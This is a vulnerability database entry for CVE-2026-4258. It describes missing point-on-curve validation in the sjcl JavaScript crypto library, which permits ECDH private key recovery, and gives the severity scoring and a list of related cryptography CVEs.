QSearchQSearch

CVE-2026-4258

7.5 HIGH

All versions of the package sjcl are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validat...

Published: 2026-03-17 · Last updated: 2026-06-03

Severity and scoring

CVSS
7.5 HIGH
Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE
CWE-325, CWE-347

Affected products

VendorProduct
bitwiseshiftleftstanford_javascript_crypto_library

Description

All versions of the package sjcl are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey(). An attacker can recover a victim's ECDH private key by sending crafted off-curve public keys and observing ECDH outputs. The dhJavaEc() function directly returns the raw x-coordinate of the scalar multiplication result (no hashing), providing a plaintext oracle without requiring any decryption feedback.

Source: NVD

References

Related CVEs

Same CWE

  • CVE-2026-41694 Since Spring Security SAML decrypts SAML Responses as well as elements of SAML LogoutRequests and LogoutResponses without requiring a val... (3.7 LOW)
  • CVE-2026-45446 Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) mishandle the authentication of AAD (Additional Authe... (4.8 MEDIUM)
  • CVE-2026-45445 Issue summary: When an application drives an AES-OCB context through the public EVP_Cipher() one-shot interface, the application-supplied... (7.5 HIGH)
  • CVE-2026-42770 Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgro... (3.7 LOW)
  • CVE-2026-0420 An improper implementation of TLS certificate validation vulnerability found in ReadyCloud client app which can allow an attacker to perf...